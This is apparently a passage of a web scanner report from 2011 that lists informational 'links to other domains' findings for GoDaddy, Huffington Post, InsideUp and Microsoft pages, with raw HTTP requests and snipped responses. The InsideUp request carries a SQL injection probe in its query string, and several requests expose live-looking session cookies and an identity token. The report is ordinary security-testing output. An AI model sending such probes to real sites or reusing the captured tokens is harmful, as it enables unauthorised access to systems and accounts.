               <td><img src="https://imagesak.securepaynet.net/aaa/sb/tab_right_grey.gif" name="tabRight2" width="8" height="6"></td>
               <td rowspan="2" style="border-bottom:1px solid #444444;height:26px;width:14px;"><img src="https://imagesak.securepaynet.net/assets/spc_trans.gif" width="14" height="26"></td>
...[SNIP]...
<a href="javascript:togSB('test');"><img src="https://imagesak.securepaynet.net/aaa/sb/bul_close.gif" border="0" width="9" height="9" hspace="4" name="test_img"></a>
...[SNIP]...
<a href="javascript:openAPP1Popup();"><img src="https://imagesak.securepaynet.net/aaa/hosting/14886_hostingconnection_nowait.gif" border="0" width="178" height="92" alt="GoDaddy Hosting Connection"/></a>
...[SNIP]...
<a href="https://www.godaddy.com/gdshop/hosting/grid.asp?ci=13633&isc=gpash016"><img src="https://imagesak.securepaynet.net/aaa/hosting/23573_img_rsb_gridbeta.jpg" width="179" height="148" border="0" title="Grid Hosting"></a>
...[SNIP]...
<div id="qb_Shared_osdiv_l"><img src="https://imagesak.securepaynet.net/aaa/hosting/14886_linux_trans.gif" width="15" height="17" alt="Linux" align="absmiddle"> Linux Server</div>
...[SNIP]...
<div id="qb_Shared_osdiv_w" style="display:none;"><img src="https://imagesak.securepaynet.net/aaa/hosting/14886_win_trans.gif" width="20" height="17" alt="Windows" align="absmiddle"> Windows Server</div>
...[SNIP]...
<div id="divSharedQBAddWork" style="display:none" align="center"><img src="https://imagesak.securepaynet.net/aaa/quickbuy/spinner.gif"></div>
...[SNIP]...
<div id="qb_Virtual_osdiv_l"><img src="https://imagesak.securepaynet.net/aaa/hosting/14886_linux_trans.gif" width="15" height="17" alt="Linux" align="absmiddle"> Linux Server</div>
...[SNIP]...
<div id="qb_Virtual_osdiv_w" style="display:none;"><img src="https://imagesak.securepaynet.net/aaa/hosting/14886_win_trans.gif" width="20" height="17" alt="Windows" align="absmiddle"> Windows Server</div>
...[SNIP]...
<div id="divVirtualQBAddWork" style="display:none" align="center"><img src="https://imagesak.securepaynet.net/aaa/quickbuy/spinner.gif"></div>
...[SNIP]...
<div id="qb_Dedicated_osdiv_l"><img src="https://imagesak.securepaynet.net/aaa/hosting/14886_linux_trans.gif" width="15" height="17" alt="Linux" align="absmiddle"> Linux Server</div>
...[SNIP]...
<div id="qb_Dedicated_osdiv_w" style="display:none;"><img src="https://imagesak.securepaynet.net/aaa/hosting/14886_win_trans.gif" width="20" height="17" alt="Windows" align="absmiddle"> Windows Server</div>
...[SNIP]...
<div id="divDedicatedQBAddWork" style="display:none" align="center"><img src="https://imagesak.securepaynet.net/aaa/quickbuy/spinner.gif"></div>
...[SNIP]...
</div>
<link rel="stylesheet" href="https://imagesak.securepaynet.net/js/mocha/css/ui.css" type="text/css" />
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/mootools-1.2-core.js"></script>
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/mootools-1.2-more.js"></script>
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/excanvas-compressed.js"></script>
<script type="text/javascript" src="https://imagesak.securepaynet.net/js/mocha/scripts/mocha-9a.5.js" charset="utf-8"></script>
...[SNIP]...
20.106. https://www.godaddy.com/hosting/website-builder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /hosting/website-builder.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hosting/website-builder.aspx?app%5Fhdr=&isc=gpash017 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:31 GMT
Content-Length: 139715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link rel="Stylesheet" type="text/css" href="https://img2.wsimg.com/fos/css/1/sales_https_20110128ak.css" /><title>
...[SNIP]...
<meta http-equiv="Pragma" content="no-cache" /><link rel="Stylesheet" type="text/css" href="https://img2.wsimg.com/pc_css/1/gd_20110321_https.min.css" />


<link rel="canonical" href="https://www.godaddy.com/hosting/website-builder.aspx"/>
...[SNIP]...
<meta name="keywords" content="website builder, how to make a Web site, create a Web site, make a Web site, make your own Web site, Go Daddy.com, Go Daddy, godaddy.com, godaddy" /><link rel="shortcut icon" href="https://img1.wsimg.com/assets/godaddy.ico" /></head>
<body id="ctl00_PageBody" style="width:100%;margin:0;">
   
<script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!--HEADERBEGIN-->

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110203.min.js"></script>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/">
Check My Webmail</a>
...[SNIP]...
</div>
       

<script src="https://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"></script>


<script src="https://img3.wsimg.com/fos/script/sales14.min.js" type="text/javascript"></script>
   

<script src="https://img3.wsimg.com/fos/script/atlantis_jquery8.min.js" type="text/javascript"></script>
...[SNIP]...
20.107. http://www.huffingtonpost.com/permalink-tracker.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /permalink-tracker.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /permalink-tracker.html?vertical=politics HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.6.10.1301171812

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=220
Date: Sat, 26 Mar 2011 20:36:16 GMT
Content-Length: 966
Connection: close

<html>
<head>
<title>Huffit Tracker</title>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js&amp;v44491"></script>
</head>
<body>
   <!-- Con
...[SNIP]...
20.108. http://www.huffingtonpost.com/threeup.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /threeup.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /threeup.php?threeup=yes&VerticalName=Politics&entry_id=840995&v=1&h=15 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.1.10.1301171812; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:06 GMT
Content-Length: 7266
Connection: close

       <div id="840914" class="grid third flush_top threeup_entries">
           <div id="entry_840914" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/03/25/the-2012-speculatron-week-4_n_840914.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/Politics');">            <img src="http://i.huffpost.com/gen/245894/thumbs/r-SPECULATRON-SPLASH-medium260.jpg" border="0" width="260" height="75" alt="" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/03/25/wisconsin-union-law-publi_n_840870.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/Politics');">            <img src="http://i.huffpost.com/gen/250702/thumbs/r-SCOTT-WALKER-medium260.jpg" border="0" width="260" height="75" alt="" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/03/25/sarah-palin-reloads-lamestream-media_n_840490.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/Politics');">            <img src="http://i.huffpost.com/gen/260247/thumbs/r-SARAH-PALIN-RELOADS-LAMESTREAM-MEDIA-medium260.jpg" border="0" width="260" height="75" alt="" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/03/26/gop-iowa-steve-king-2012_n_840956.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/Politics');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/260669/thumbs/r-BARBOUR-medium260.jpg" border="0" width="260" height="75" id="threeup_image_840956" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/03/25/paul-lepage-olympia-snowe-2012-labor_n_840689.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/Politics');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/260516/thumbs/r-OLYMPIA-SNOWE-medium260.jpg" border="0" width="260" height="75" id="threeup_image_840689" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/03/25/2012-bachmann-huckabee-thompson_n_840833.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/Politics');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/260534/thumbs/r-MICHELE-BACHMANN-MIKE-HUCKABEE-medium260.jpg" border="0" width="260" height="75" id="threeup_image_840833" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/03/25/haley-barbour-known-for-f_n_840653.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/Politics');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/260396/thumbs/r-HALEY-BARBOUR-FUNDRAISING-2012-medium260.jpg" border="0" width="260" height="75" id="threeup_image_840653" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/03/25/capandtrade-could-be-stum_n_840587.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/Politics');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/260343/thumbs/r-JON-HUNSTMAN-CAP-AND-TRADE-medium260.jpg" border="0" width="260" height="75" id="threeup_image_840587" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/03/26/budget-talks-government-shutdown_n_840983.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/Politics');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/260692/thumbs/r-BUDGET-GOVERNMENT-SHUTDOWN-medium260.jpg" border="0" width="260" height="75" id="threeup_image_840983" />        </a>
...[SNIP]...
20.109. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:15:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<td height="90" align="left">
                                                                               <a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=109060517022">
                                                               <img src="http://www.insideup.com/ppc/LeadFlowImages/BBB_logo_img.jpg" width="126" height="49" />
...[SNIP]...
<td width="135" align="center" valign="top"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.insideup.com&size=L&use_flash=NO&use_transparent=NO...=en"></script><br /><a href="http://www.verisign.com/verisign-trust-seal" target="_blank" style="color:#000000; text-decoration:none; font:bold 7px verdana,sans-serif; letter-spacing:.5px; text-align:center; margin:0px; padding:0px;">ABOUT TRUST ONLINE</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1028748950/?label=SnlsCJqH2QEQlu3F6gM&guid=ON&script=0"/>
</div>
...[SNIP]...
<noscript>
<img src="http://pro.marinsm.com/tp?act=1&cid=zbygse58m0&script=no" >
</noscript>
...[SNIP]...
20.110. http://www.microsoft.com/security/msrc/RssFeedGenerator.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /security/msrc/RssFeedGenerator.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /security/msrc/RssFeedGenerator.aspx?URLs=http://blogs.technet.com/msrc/rss.xml,http://blogs.technet.com/b/srd/rss.aspx&itemToDisplay=3&words=16 HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/security/msrc/default.aspx
Content-Length: 0
Origin: http://www.microsoft.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; MS_SRDR=homepageOptInState=forceOut; mscomhp=stickyTabIndex%3A0%2Cpath%3A/en/us%7CstickyTabIndex%3A0%2Cpath%3A/en/us; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; WebLanguagePreference=en-us; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; WT_NVR=0=/:1=technet|security|casestudies|en-us:2=technet/security|licensing/how-to-buy|en/us|business/bposoffer|downloads/en|web/websitespark:3=technet/security/advisory|sqlserver/en/us; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi^0001A@E0J02hA@E0J; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093009734:ss=1301092848759

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 791400142700000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:44:25 GMT
Content-Length: 1938

<div id="rssData1"><div><table width="100%" cellspacing="0" cellpadding="0" border="0" ><tr><td><a href="http://blogs.technet.com/b/msrc/archive/2011/03/23/microsoft-releases-security-advisory-2524375.aspx" target="_blank"><b>
...[SNIP]...
<td><a href="http://blogs.technet.com/b/srd/archive/2011/03/17/blocking-exploit-attempts-of-the-recent-flash-0-day.aspx" target="_blank"><b>
...[SNIP]...
<td><a href="http://blogs.technet.com/b/msrc/archive/2011/03/11/q-amp-a-from-the-march-2011-security-bulletin-webcast.aspx" target="_blank"><b>
...[SNIP]...
<td style="padding-bottom:10px;">Hello,
Today we published the <a href="http://blogs.technet.com/b/msrc/p/march-2011-security-bulletin-q-a.aspx">March Security Bulletin Webcast Questions &amp; Answers page</a>
...[SNIP]...
20.111. http://www.microsoft.com/security/msrc/Twitter_msrc_Feeds_New.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /security/msrc/Twitter_msrc_Feeds_New.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /security/msrc/Twitter_msrc_Feeds_New.aspx?URLs=http://twitter.com/statuses/user_timeline/116285769.rss&itemToDisplay=3 HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/security/msrc/default.aspx
Content-Length: 0
Origin: http://www.microsoft.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; MS_SRDR=homepageOptInState=forceOut; mscomhp=stickyTabIndex%3A0%2Cpath%3A/en/us%7CstickyTabIndex%3A0%2Cpath%3A/en/us; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; WebLanguagePreference=en-us; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; WT_NVR=0=/:1=technet|security|casestudies|en-us:2=technet/security|licensing/how-to-buy|en/us|business/bposoffer|downloads/en|web/websitespark:3=technet/security/advisory|sqlserver/en/us; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi^0001A@E0J02hA@E0J; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093009734:ss=1301092848759

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 438673042900000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:44:30 GMT
Content-Length: 1922

<table width="100%" cellspacing="0" cellpadding="0"><tr><td>We...ve issued Security Advisory 2524375 to address fraudulent Comodo-issued digital certificates <a href="http://bit.ly/gnc6HI" target="_blank">http://bit.ly/gnc6HI</a>
...[SNIP]...
